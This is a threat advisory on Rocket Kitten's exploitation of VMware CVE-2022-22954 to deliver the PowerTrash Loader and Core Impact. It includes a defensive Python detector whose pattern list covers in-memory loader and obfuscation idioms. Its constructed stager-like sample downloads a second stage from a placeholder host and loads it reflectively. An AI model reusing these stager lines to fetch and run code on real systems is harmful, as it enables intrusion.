Newly patched VMware vulnerability exploited by Iranian espionage group, Rocket Kitten
THREAT LEVEL: Red.
An Iranian cyber-espionage group known as Rocket Kitten has begun delivering the Core Impact penetration-testing tool to vulnerable systems by exploiting a recently patched critical vulnerability in VMware Workspace ONE Access/Identity Manager.
The threat actors exploit the VMware Identity Manager Service flaw (CVE-2022-22954) to gain initial access to a target system, then install a PowerShell stager that downloads the next-stage payload, nicknamed PowerTrash Loader. PowerTrash Loader is a heavily obfuscated PowerShell script of roughly 40,000 lines. At the end of the attack chain, PowerTrash Loader loads the Core Impact penetration-testing framework into memory.
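The chain above (stager that downloads a very large, heavily obfuscated PowerShell script which then loads a framework reflectively into memory) can be triaged with simple heuristics. The following is an added example written for this advisory, not code from HivePro or Morphisec: it scores a PowerShell script body on in-memory loader primitives, obfuscation density and size, and runs over two constructed samples (neither is a real PowerTrash or stager artifact; URLs and payloads are placeholders).

```python
import re
from typing import Dict

# Primitives an in-memory loader needs. Each is legitimate alone; the combination is the signal.
LOADER_PATTERNS = {
    "reflective_load": r"\[(System\.)?Reflection\.Assembly\]::Load\b",
    "base64_decode": r"FromBase64String\(",
    "invoke_expression": r"\bIEX\b|Invoke-Expression",
    "encoded_command": r"-EncodedCommand\b|\s-enc\s",
    "download": r"Net\.WebClient|DownloadString|Invoke-WebRequest",
}
# Obfuscation idioms: char-code construction, string reassembly, backtick-split keywords.
OBFUSCATION_PATTERNS = [
    r"\[char\]\s*\d+",       # [char]73 style character construction
    r"-join\b",              # reassembling split strings
    r"-replace\b",           # runtime substitution of placeholder tokens
    r"`[a-z]",               # backticks inside identifiers, e.g. Ne`w-Object
    r"\{\d+\}.*-f\b",        # format-operator string reassembly
]

def score_script(text: str) -> Dict[str, object]:
    """Return a triage record for one PowerShell script body (thresholds are assumptions)."""
    lines = text.splitlines()
    loader_hits = sorted(
        name for name, pat in LOADER_PATTERNS.items() if re.search(pat, text, re.IGNORECASE)
    )
    obf_hits = sum(len(re.findall(pat, text, re.IGNORECASE)) for pat in OBFUSCATION_PATTERNS)
    obf_density = obf_hits / max(len(lines), 1)
    score = 2 * len(loader_hits)
    score += 3 if obf_density > 0.5 else 0    # heavily obfuscated per line
    score += 2 if len(lines) > 10_000 else 0  # PowerTrash-scale script size
    return {
        "line_count": len(lines),
        "loader_hits": loader_hits,
        "obfuscation_hits": obf_hits,
        "score": score,
        "verdict": "suspicious" if score >= 5 else "benign",
    }

# Constructed samples (not real malware); the second mimics stager idioms with placeholders only.
BENIGN_SAMPLE = """$files = Get-ChildItem -Path C:\\Logs -Filter *.log
foreach ($f in $files) { Write-Output $f.Name }"""

STAGER_LIKE_SAMPLE = """$s = (Ne`w-Object Net.WebClient).DownloadString('http://PLACEHOLDER.invalid/stage2')
$d = [System.Convert]::FromBase64String('PLACEHOLDER_BASE64')
$a = [System.Reflection.Assembly]::Load($d)
$c = -join ([char]73, [char]69, [char]88)"""

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_SAMPLE), ("stager-like", STAGER_LIKE_SAMPLE)):
        print(name, score_script(body))
```

In production the size and density thresholds should be tuned against the organisation's own signed administrative scripts, since `FromBase64String` and `-join` alone are common in legitimate tooling.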
The MITRE ATT&CK tactics and techniques commonly used by Rocket Kitten are:
TA0001: Initial Access
TA0002: Execution
TA0006: Credential Access
TA0009: Collection
TA0011: Command and Control
T1059: Command and Scripting Interpreter
T1189: Drive-by Compromise
T1555.003: Credentials from Password Stores: Credentials from Web Browsers
T1105: Ingress Tool Transfer
T1056.001: Input Capture: Keylogging
T1566.001: Phishing: Spearphishing Attachment
T1566.003: Phishing: Spearphishing via Service
T1204.002: User Execution: Malicious File
Actor Details
Vulnerability Details
Indicators of Compromise (IoCs)
Patch Links
https://www.vmware.com/security/advisories/VMSA-2022-0011.html
References
https://blog.morphisec.com/vmware-identity-manager-attack-backdoor